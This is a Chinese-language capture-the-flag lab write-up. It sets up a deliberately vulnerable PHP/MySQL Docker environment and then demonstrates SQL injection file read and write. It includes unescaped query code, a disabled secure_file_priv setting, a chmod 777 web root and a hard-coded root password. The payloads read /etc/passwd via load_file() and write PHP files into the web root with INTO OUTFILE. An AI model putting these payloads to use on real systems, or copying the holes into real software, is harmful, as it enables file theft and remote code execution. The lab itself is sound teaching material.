1. 利用docker搭建环境

1. Dockerfile编写

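# Base image. ubuntu:16.04 is end-of-life; it is kept only because the challenge was
# built against its PHP 7.0 / MySQL 5.7 stack. Pin by digest if the lab must be reproducible.
FROM ubuntu:16.04

# UTF-8 locale. The locale name is case-sensitive: C.UTF-8, not c.UTF-8.
ENV LANG=C.UTF-8

# Build-time only: keep apt/debconf from prompting. ARG rather than ENV so the
# setting does not leak into the running container.
ARG DEBIAN_FRONTEND=noninteractive

# Local apt mirror configuration.
COPY ./docker/sources.list /etc/apt/sources.list

# Apache2, MySQL, PHP and the PHP extensions the challenge code needs, installed in
# one layer so the apt index never goes stale; the index is removed in the same layer
# to keep the image small. The stock index.html is dropped in favour of the challenge files.
RUN apt-get -y update \
    && apt-get -yqq install \
        libapache2-mod-php \
        mysql-server \
        php \
        php-curl \
        php-mysql \
    && rm -rf /var/lib/apt/lists/* \
    && rm -f /var/www/html/*

# Disable Apache directory listing (Options None) and, deliberately for this challenge,
# lift MySQL's file-access restriction: an empty secure_file_priv lets load_file() and
# INTO OUTFILE read/write anywhere mysqld's OS user can. The line is appended at the end
# of mysqld.cnf, which is inside its [mysqld] section.
RUN sed -i 's/Options Indexes FollowSymLinks/Options None/' /etc/apache2/apache2.conf \
    && sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf

# ADD (not COPY) on purpose: it unpacks the local tarball into the web root.
ADD ./sources/CTF.tar /var/www/html/

# Seed SQL; applied by start.sh at container start.
COPY ./docker/ctf.sql /root/

# Ownership for Apache; the web root and its files are then made world-writable on
# purpose so that mysqld (running as the `mysql` user) can drop a file there via
# INTO OUTFILE — this is the intended path of the challenge, not an oversight.
# Do not "fix" this to least privilege without re-checking the write-file step.
RUN chown www-data:www-data /var/www/html/* \
    && chmod 777 /var/www/html /var/www/html/*

COPY ./docker/start.sh /root/
RUN chmod +x /root/start.sh

# Exec form: start.sh is PID 1 and receives docker stop's SIGTERM directly.
# The script only uses absolute paths, so no `cd /root` is needed.
ENTRYPOINT ["/root/start.sh"]
EXPOSE 80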

2.start.sh

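#!/bin/bash
# Container entrypoint: bring up MySQL, set the root password, load the challenge
# schema, then run Apache in the foreground.
#
# The root password is deliberately hard-coded: it must match the Mysql class in
# index.php, which connects as root (so the injected queries also get FILE privilege).
ROOT_PW="Cdusec123456"

# Brief pause before poking the init scripts on a freshly started container.
sleep 1
service mysql restart

# Sets the password on first boot. On a restarted container the password is already
# set and this call fails with "access denied"; that is expected and not fatal.
mysqladmin -u root password "$ROOT_PW" || true

# Pass the password through MYSQL_PWD rather than -p<pw> so it is not visible to
# every user in `ps` / /proc while the import runs.
MYSQL_PWD="$ROOT_PW" mysql -u root < /root/ctf.sql

# exec so apache2ctl replaces this shell as PID 1 and receives docker stop's SIGTERM.
exec /usr/sbin/apache2ctl -D FOREGROUND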

3.ctf.sql

-- Seed data for the challenge. The `admins` table holds decoy "flags" in the
-- password column; the real flag is elsewhere (read/write files via injection).
CREATE DATABASE IF NOT EXISTS ctfC;
USE ctfC;

CREATE TABLE IF NOT EXISTS admins (
    id       INT(10) PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(100),
    password VARCHAR(100)
);

-- Explicit ids so the rows are stable across re-imports.
INSERT INTO admins (id, username, password) VALUES
    (1, 'admin',  'flag{flag_is_not_there}'),
    (2, 'admin1', 'flag{flag_is_not_there}'),
    (3, 'admin2', 'flag{flag_is_not_there}'),
    (4, 'admin3', 'flag{flag_is_not_there}');

4.index.php

<?php

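class Mysql {
    /** @var string MySQL host */
    public $servername;
    /** @var string MySQL user (root, so injected queries also carry FILE privilege) */
    public $username;
    /** @var string MySQL password; must match start.sh */
    public $password;
    /** @var string database name */
    public $dbname;
    /** @var mysqli|null open connection created by conn() */
    public $con;

    /**
     * Open a connection with the given (hard-coded by default) credentials.
     * Properties are declared explicitly: dynamic property creation is deprecated
     * as of PHP 8.2 and would start emitting warnings.
     */
    public function __construct($servername = "127.0.0.1",$username ="root",$password = "Cdusec123456",$dbname = "ctfC")
    {
        $this->servername =$servername;
        $this->username =$username;
        $this->password =$password;
        $this->dbname =$dbname;
        $this->con = $this->conn();
    }

    /** Close the connection if one was actually established. */
    public function __destruct()
    {
        if ($this->con instanceof mysqli) {
            $this->con->close();
        }
    }

    /**
     * Connect to MySQL. Terminates the script on failure.
     *
     * @return mysqli
     */
    public function conn()
    {
        $conn = new mysqli($this->servername, $this->username, $this->password, $this->dbname);

        if ($conn->connect_error) {
            die("连接失败: " . $conn->connect_error);
        }else{
            return $conn;
        }

    }

    /**
     * Print every admins row matching $id and report whether any matched.
     *
     * INTENTIONALLY VULNERABLE: $id is interpolated unescaped into the statement.
     * This is the SQL injection the challenge is built around (UNION SELECT,
     * load_file(), INTO OUTFILE). The real fix is a prepared statement —
     *   $stmt = $this->con->prepare("SELECT * FROM admins WHERE id=?");
     *   $stmt->bind_param("i", $id);
     * — but applying it to the challenge image would remove the challenge.
     *
     * @param mixed $id raw value from the query string
     * @return bool True if at least one row was printed, False otherwise
     */
    public function sel($id)
    {
        $sql = "SELECT * FROM admins WHERE id=$id";
        $result = $this->con->query($sql);

        // A malformed query (e.g. a broken injection payload) makes query() return
        // false; reading ->num_rows on it only yields a PHP warning. Treat it as
        // "no rows" explicitly instead.
        if ($result === false || $result->num_rows <= 0) {
            return False;
        }

        while ($row = $result->fetch_assoc()) {
            echo "id: " . $row['id']. " - Name: " . $row['username']. " -Password: " . $row['password']. "<br>";
        }
        $result->free();
        return True;
    }
}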


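// Entry point. `id` is taken straight from the query string and handed to
// Mysql::sel() without validation — that is the challenge's injection point.
// isset() avoids an "undefined index" notice when the parameter is absent; an
// empty id still yields a failed query and therefore "NO".
$id = isset($_GET['id']) ? $_GET['id'] : '';

$sql = new Mysql();

$re = $sql->sel($id);
if ($re === True) {
    echo "Congratulations";
} else {
    echo "NO";
}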

2.文件写入条件

1.读写文件受 secure_file_priv 限制

  • secure_file_priv = '' //空字符串：load_file()/INTO OUTFILE 的路径不受限制（仅受 mysqld 进程所属 OS 用户的文件系统权限约束）
  • secure_file_priv = NULL //禁止一切文件读写
  • secure_file_priv=/var/tmp //只允许在该目录及其子目录内读写，其它路径一律拒绝（Ubuntu 的 MySQL 5.7 包默认就是此类目录限制，而非空值）
  除此之外，执行读写的数据库用户还必须具有 FILE 权限；本环境中 index.php 以 root 连接，天然具备。
# 修改 /etc/mysql/mysql.conf.d/mysqld.cnf，在文件末尾（位于 [mysqld] 段内）追加 secure_file_priv = ''
# 注意 sed 脚本与文件路径之间必须有空格：若写成 '...'/etc/... 两者会拼成一个参数，sed 会把整串当作脚本并从标准输入读取
sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf

2.读取文件

load_file()：读取整个文件并以字符串返回。要求当前数据库用户具有 FILE 权限、文件对 mysqld 进程所属 OS 用户可读，且路径满足 secure_file_priv；任一条件不满足时函数只返回 NULL，不会报错。

http://192.168.74.138:21101/?id=1 union select 1,'2',load_file('/etc/passwd') --+

3.写入文件

into outfile 或 into dumpfile。outfile 按行格式化输出（行尾加换行、对特殊字符转义）；dumpfile 只写一行且原样写入，因此适合写二进制文件。两者都拒绝覆盖已存在的文件，且目标目录必须对 mysqld 的 OS 用户可写——这正是 Dockerfile 中对 /var/www/html 执行 chmod 777 的原因。

http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '/var/www/html/1.php' --+

http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '/var/www/html/5.php' --+

Q.E.D.